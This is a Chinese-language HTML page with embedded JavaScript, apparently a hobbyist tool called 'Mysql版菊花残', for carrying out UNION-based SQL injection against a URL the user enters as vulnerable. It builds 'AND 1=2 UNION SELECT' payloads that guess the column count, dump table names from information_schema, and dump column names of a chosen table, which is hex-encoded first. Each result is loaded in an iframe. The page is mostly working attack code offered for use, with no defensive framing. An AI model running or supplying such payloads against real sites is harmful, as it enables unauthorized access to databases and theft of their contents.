<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Mysql版菊花残</title>
    <link rel="stylesheet" href="http://cdn.amazeui.org/amazeui/2.7.0/css/amazeui.min.css">
    <script src="http://libs.baidu.com/jquery/1.11.3/jquery.min.js"></script>
    <script src="http://cdn.amazeui.org/amazeui/2.7.0/js/amazeui.js"></script>
    <script>
        $(function () {


            var field = '';
            var iterator = 1;

            /**
             * 字符串转化成十六进制编码
             */
            var jsbin2hex = function bin2hex(s) {
                //  discuss at: http://locutus.io/php/bin2hex/
                // original by: Kevin van Zonneveld (http://kvz.io)
                // bugfixed by: Onno Marsman (https://twitter.com/onnomarsman)
                // bugfixed by: Linuxworld
                // improved by: ntoniazzi (http://locutus.io/php/bin2hex:361#comment_177616)
                //   example 1: bin2hex('Kev')
                //   returns 1: '4b6576'
                //   example 2: bin2hex(String.fromCharCode(0x00))
                //   returns 2: '00'
                var i
                var l
                var o = ''
                var n
                s += ''
                for (i = 0, l = s.length; i < l; i++) {
                    n = s.charCodeAt(i)
                            .toString(16)
                    o += n.length < 2 ? '0' + n : n
                }

                return o
            };

            var url = function () {
                return $('#url').val()
            };

            var injectionUrl = function (url) {
                $('#injection-url').html(url);
                $('#injection-href').attr('href', url);
            };


            $('.field-test, .table-test, .table-field, .refresh').on('click', function () {
                var str = url() + ' AND 1 =2 UNION SELECT ';

                var export_filed = '';
                var condition = '';

                if ($(this).hasClass('field-test')) {//测试字段的，以数字形式递增测试。便于后面使用。
                    str += '1';
                    export_filed = iterator;
                    condition = "";
                } else if ($(this).hasClass('table-test')) {//爆数据库所有表名称
                    str += export_filed = 'group_concat(a.table_name)';

                    var limit = $('#table-limit').val();
                    condition = ' FROM ( SELECT table_name FROM information_schema.tables LIMIT ' + limit + ', 100 ) AS a'

                } else if ($(this).hasClass('table-field')) {//爆数据库表字段
                    str += export_filed = 'group_concat(a.column_name)';

                    var limit = $('#field-limit').val();
                    var table_name = jsbin2hex($('#table-name').val());
                    $('#demo-name').val(table_name);
                    condition = ' FROM (SELECT column_name FROM information_schema.columns WHERE table_name = 0x' + table_name + ' LIMIT ' + limit + ', 100 ) AS a ';
                }

                if (iterator > 1) {
                    if (!$(this).hasClass('refresh')) {
                        field += ',' + export_filed;
                    }
                    str += field;
                }
                str += condition;

                $('#view').attr('src', str);
                injectionUrl(str);
                if (!$(this).hasClass('refresh')) {
                    var number = '';
                    for (i = 1; i <= iterator; i++) {
                        number += number == '' ? i : ',' + i;
                    }
                    $('#injection-num').html(number);
                    iterator++;
                }
            });

            /**
             * 重置数据
             */
            $('.refield-test').on('click', function () {
                field = '';
                iterator = 1;
                injectionUrl(url())
                $('#injection-num').html('');
            });
        })
    </script>
</head>
<body style="background: #f8f8f8;">
<form class="am-form">
    <fieldset>
        <legend>Mysql版菊花残 <span class="am-text-sm">——By luo</span></legend>

        <div class="am-form-group">
            <input type="text" id="url" placeholder="存在注入的网址">

            <p class="am-text-middle">

            </p>
        </div>
        <div class="am-form-group">
            <a href="javascript:;" class="am-btn am-btn-success am-btn-xs refield-test">重置测试</a>
        </div>

        <div class="am-form-group">
            <a href="javascript:;" class="am-btn am-btn-primary am-btn-xs field-test">字段测试</a>
            <a href="javascript:;" class="am-btn am-btn-secondary am-btn-xs field-test refresh">更新数据</a>
        </div>

        <div class="am-form-group">
            起止行:
            <input type="text" class=" am-inline am-input-sm" id="table-limit" value="0" placeholder="爆表起止行" style="width: 50px;">
            <a href="javascript:;" class="am-btn am-btn-danger am-btn-xs table-test">开始爆表</a>
            <a href="javascript:;" class="am-btn am-btn-secondary am-btn-xs table-test refresh">更新数据</a>
        </div>

        <div class="am-form-group">
            表名:
            <input type="text" class=" am-inline am-input-sm" id="table-name" value="" placeholder="要爆破的表名称" style="width: 100px;">
            <input type="text" class=" am-inline am-input-sm" id="demo-name" readonly value="" placeholder="字符串转16进制结果" style="width: 100px;">
            字段起止行:
            <input type="text" class=" am-inline am-input-sm" id="field-limit" value="0" placeholder="爆表起止行" style="width: 50px;">
            <a href="javascript:;" class="am-btn am-btn-warning am-btn-xs table-field">开始爆表字段</a>

            <a href="javascript:;" class="am-btn am-btn-secondary am-btn-xs table-field refresh">更新数据</a>
        </div>


        <div class="am-form-group">
            <p>对应字段数字猜想：<span id="injection-num"></span></p>

            <p><a id="injection-href" href="" target="_blank">当前注入URL</a> ：<span id="injection-url"></span></p>
        </div>
    </fieldset>
</form>
<hr data-am-widget="divider" style="" class="am-divider am-divider-dotted am-margin-bottom-0 "/>
<iframe id="view" src="about:blank" width="100%" height="500"></iframe>
</body>
</html>